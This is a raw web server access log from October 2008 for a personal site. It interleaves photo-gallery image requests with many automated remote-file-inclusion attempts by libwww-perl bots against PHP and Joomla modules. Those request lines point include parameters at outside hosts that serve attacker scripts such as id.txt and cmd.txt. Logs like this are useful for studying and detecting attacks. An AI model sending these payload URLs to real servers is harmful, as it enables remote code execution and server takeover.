72.199.235.196 - - [26/Oct/2008:09:00:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-037_2.jpg HTTP/1.1" 200 389560 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:00:09 -0700] "GET /logs/access_080429.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.20.53.210 - - [26/Oct/2008:09:00:09 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.20.53.210 - - [26/Oct/2008:09:00:09 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:09:00:11 -0700] "GET /logs/access_080909.log//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:00:16 -0700] "GET /logs/access_080702.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.29.68.220 - - [26/Oct/2008:09:00:28 -0700] "GET /logs//login.php?dir=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [26/Oct/2008:09:00:29 -0700] "GET /login.php?dir=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:00:29 -0700] "GET /logs/access_080708.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.midportal.com///upload/image/httpd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:00:31 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0004.jpg HTTP/1.1" 200 512676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:00:35 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:00:35 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:00:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-071.jpg HTTP/1.1" 200 452343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:00:54 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:00:55 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:00:55 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:01:00 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:01:05 -0700] "GET /logs/access_080925.log//index.php?option=com_extcalendar&Itemid=&extmode=view&extid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:01:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-007_2.jpg HTTP/1.1" 200 350863 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
121.78.225.22 - - [26/Oct/2008:09:01:37 -0700] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:01:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-015_3.jpg HTTP/1.1" 200 489238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
121.78.225.22 - - [26/Oct/2008:09:01:39 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 200 94831 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
118.45.190.166 - - [26/Oct/2008:09:01:39 -0700] "GET /logs/access_081008.log//index.php?_SERVER[DOCUMENT_ROOT]=http://sayphoto.net/bbs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:01:40 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:02:12 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0036.jpg HTTP/1.1" 200 378857 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
121.78.225.22 - - [26/Oct/2008:09:02:20 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:02:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-105.jpg HTTP/1.1" 200 561425 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
88.158.0.5 - - [26/Oct/2008:09:02:37 -0700] "GET /logs/access_080830.log//netcat/require/errors.php?error=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [26/Oct/2008:09:02:42 -0700] "GET /netcat/require/errors.php?error=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:02:46 -0700] "GET /logs//netcat/require/errors.php?error=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:02:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0122.jpg HTTP/1.1" 200 508109 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
64.20.53.210 - - [26/Oct/2008:09:02:53 -0700] "GET /logs/access_080315.log%20/components/com_rwcards/captcha/captcha_image.php?img=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
83.13.184.138 - - [26/Oct/2008:09:03:03 -0700] "GET /default.php?basepath=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:03:06 -0700] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:07 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:09 -0700] "GET /logs/access_080506.log//language.inc.php?langs_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:10 -0700] "GET /language.inc.php?langs_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:11 -0700] "GET /default.php?basepath=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.187 - - [26/Oct/2008:09:03:12 -0700] "GET /logs/access_081017.log HTTP/1.0" 200 3688815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.126.46.141 - - [26/Oct/2008:09:03:12 -0700] "GET /logs//language.inc.php?langs_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.58.114 - - [26/Oct/2008:09:03:15 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:15 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-085_1.jpg HTTP/1.1" 200 426751 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:26 -0700] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:03:27 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.214.171.59 - - [26/Oct/2008:09:03:29 -0700] "GET /logs/access_080918.log//?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:30 -0700] "GET /logs//?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
123.214.171.59 - - [26/Oct/2008:09:03:30 -0700] "GET /?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 8097 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
216.12.23.253 - - [26/Oct/2008:09:03:35 -0700] "GET /logs/access_080216.log//admin.php?admin_path=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.12.23.253 - - [26/Oct/2008:09:03:37 -0700] "GET /logs/access_080401.log//admin.php?admin_path=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:38 -0700] "GET /logs/access_080723.log//netcat/require/errors.php?error=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:38 -0700] "GET /default.php?basepath=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034_3.jpg HTTP/1.1" 200 307841 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:03:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-250.jpg HTTP/1.1" 200 288530 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
123.214.171.59 - - [26/Oct/2008:09:03:41 -0700] "GET /logs/access_080918.log//?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:42 -0700] "GET /logs/access_080907.log//?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
123.214.171.59 - - [26/Oct/2008:09:03:42 -0700] "GET /logs//?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:42 -0700] "GET /?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 8097 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
123.214.171.59 - - [26/Oct/2008:09:03:43 -0700] "GET /logs/access_080907.log//?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
123.214.171.59 - - [26/Oct/2008:09:03:43 -0700] "GET /logs//?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
123.214.171.59 - - [26/Oct/2008:09:03:44 -0700] "GET /logs/access_080918.log//?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
123.214.171.59 - - [26/Oct/2008:09:03:44 -0700] "GET /?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 8097 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:46 -0700] "GET /logs/access_080907.log//?view=page&pagename=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:03:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-183.jpg HTTP/1.1" 200 268994 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0011.jpg HTTP/1.1" 200 578661 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
91.121.95.109 - - [26/Oct/2008:09:04:14 -0700] "GET /logs/access_080715.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.95.109 - - [26/Oct/2008:09:04:14 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.95.109 - - [26/Oct/2008:09:04:15 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-142_1.jpg HTTP/1.1" 200 330465 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:25 -0700] "GET /logs//login.php?dir=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.89 - - [26/Oct/2008:09:04:26 -0700] "GET /logs//login.php?dir=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:26 -0700] "GET /login.php?dir=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.89 - - [26/Oct/2008:09:04:26 -0700] "GET /login.php?dir=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:04:34 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:04:34 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:34 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:04:35 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:04:35 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:04:35 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:36 -0700] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:04:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:36 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:04:40 -0700] "GET /logs/access_080109.log//modules/TotalCalendar/about.php?inc_dir=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:40 -0700] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:40 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.95.109 - - [26/Oct/2008:09:04:41 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-165.jpg HTTP/1.1" 200 347615 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
81.88.49.22 - - [26/Oct/2008:09:04:54 -0700] "GET /logs/access_080806.log//citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:54 -0700] "GET /citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:04:54 -0700] "GET /logs//citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.88.49.22 - - [26/Oct/2008:09:04:54 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:04:58 -0700] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.88.49.8 - - [26/Oct/2008:09:05:00 -0700] "GET /citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.88.49.8 - - [26/Oct/2008:09:05:00 -0700] "GET /logs//citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.88.49.8 - - [26/Oct/2008:09:05:00 -0700] "GET /logs/access_080806.log//citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
91.121.95.109 - - [26/Oct/2008:09:05:03 -0700] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:05:03 -0700] "GET /logs//citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:05:03 -0700] "GET /logs/access_080806.log//citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.233.18 - - [26/Oct/2008:09:05:03 -0700] "GET /citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:05:05 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.120.233.18 - - [26/Oct/2008:09:05:11 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:05:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-045_0.jpg HTTP/1.1" 200 399663 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:05:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-107.jpg HTTP/1.1" 200 424628 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
203.22.204.99 - - [26/Oct/2008:09:05:27 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:05:27 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.115.110.161 - - [26/Oct/2008:09:05:27 -0700] "GET /logs/access_080222.log//login.php?dir=http://dwcable.co.kr/technote/..../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.126.46.141 - - [26/Oct/2008:09:05:28 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:05:28 -0700] "GET /login.php?dir=http://dwcable.co.kr/technote/..../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:05:31 -0700] "GET /logs/access_080922.log//login.php?dir=http://dwcable.co.kr/technote/..../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:05:32 -0700] "GET /logs/access_080901.log/convert/mvcw.php?step=1&vwar_root=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.30.20.130 - - [26/Oct/2008:09:05:33 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.30.20.130 - - [26/Oct/2008:09:05:33 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.30.20.130 - - [26/Oct/2008:09:05:36 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
